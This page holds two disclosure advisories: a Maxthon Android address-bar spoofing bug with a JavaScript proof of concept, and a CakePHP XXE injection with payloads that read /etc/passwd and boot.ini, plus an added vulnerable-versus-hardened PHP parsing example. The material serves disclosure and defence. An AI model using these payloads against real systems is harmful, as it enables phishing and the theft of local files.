Maxthon Cloud Browser for Android Address Bar Spoofing
10.01.2014
CVE-2014-1449
Spoofing
# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."
2. Vulnerability
Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL shown in the address bar, which could trick the user into believing they are visiting a different site than the one actually loaded.
3. Proof of Concept
<html>
<script>
// Opens a new window, changes its location, then walks the history back
// and forward on a timer; in the vulnerable version the address bar is
// left showing a URL other than the page actually loaded.
var w;
function trigger() {
    w = window.open("http://howl.overflow.pl");
    w.location = "http://h0wl.pl";
    setTimeout('w.location = "a.html"', 1000);
    setTimeout('w.history.back();', 2000);
    setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>
PoC in action: http://howl.overflow.pl/maxthon1.mp4
4. Fix
No response from the vendor. A silent fix appears to have been applied in 4.1.5.2000 or 4.1.6.2000 (could not confirm which, as the test device updated straight to 4.1.6.2000).
5. Timeline
10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try
10.03.2014 - advisory published
CakePHP XXE Injection
01.07.2012
CVE-2012-4399
Information Disclosure / RCE
# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# CVE: CVE-2012-4399
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."
2. Vulnerability
CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) resolves external entities declared in the input document, which allows local file inclusion.
3. Proof of Concept
Linux:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>
Windows:
<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
</request>
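The following is an added example, not CakePHP's own code or part of the original advisory. It shows a hypothetical PHP endpoint that parses client-supplied XML with SimpleXML in a vulnerable form next to a hardened form, using a constructed document shaped like the PoC above but pointing at a temporary file the script creates itself, so it can be run offline. Function names and the sample input are assumptions for illustration.

```php
<?php
// Added example (not CakePHP's code): parsing untrusted XML with SimpleXML,
// vulnerable and hardened variants side by side.

// Constructed sample input: same shape as the advisory's PoC, but the
// external entity points at a temp file we create ourselves.
$secret = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secret, "SECRET-CONTENT\n");
$xml = "<!DOCTYPE cakephp [<!ENTITY payload SYSTEM \"file://$secret\">]>\n"
     . "<request><xxe>&payload;</xxe></request>";

// Vulnerable: LIBXML_NOENT asks libxml to substitute entity references, and
// on PHP < 8.0 the external entity loader is enabled by default, so the
// referenced file is read into the <xxe> element.
function parse_vulnerable(string $input): string
{
    $doc = simplexml_load_string($input, 'SimpleXMLElement', LIBXML_NOENT);
    return $doc === false ? '' : (string) $doc->xxe;
}

// Hardened: reject any document carrying a DOCTYPE (entities cannot be
// declared without one), never pass LIBXML_NOENT, pass LIBXML_NONET so no
// network fetches happen, and on PHP < 8.0 also switch the external entity
// loader off for the duration of the parse. Returns null on rejection.
function parse_hardened(string $input): ?string
{
    if (stripos($input, '<!DOCTYPE') !== false) {
        return null; // untrusted input has no business declaring a DTD
    }
    $prevLoader = null;
    if (PHP_VERSION_ID < 80000) {
        // Deprecated and unnecessary from PHP 8.0, where the loader is
        // disabled by default; guarded so the code runs on both.
        $prevLoader = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);
    $doc = simplexml_load_string($input, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    if ($prevLoader !== null) {
        libxml_disable_entity_loader($prevLoader);
    }
    return $doc === false ? null : (string) $doc->xxe;
}

var_dump(parse_vulnerable($xml));
var_dump(parse_hardened($xml));
var_dump(parse_hardened('<request><xxe>hello</xxe></request>'));
unlink($secret);
```

Run it with php from the command line. On PHP versions before 8.0 the first call returns the contents of the temporary file, reproducing the file inclusion the advisory describes; the hardened parser returns null for the same document because of the DOCTYPE check, and returns the element text for the plain document without a DTD. On PHP 8.0 and later the entity loader is off by default, so the vulnerable variant no longer reads the file, but the DOCTYPE rejection and the absence of LIBXML_NOENT still matter for internal-entity expansion attacks and for deployments that re-enable the loader elsewhere.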
4. Fix
Fix applied in versions 2.2.1 and 2.1.5. See the official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1
5. Timeline
1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix released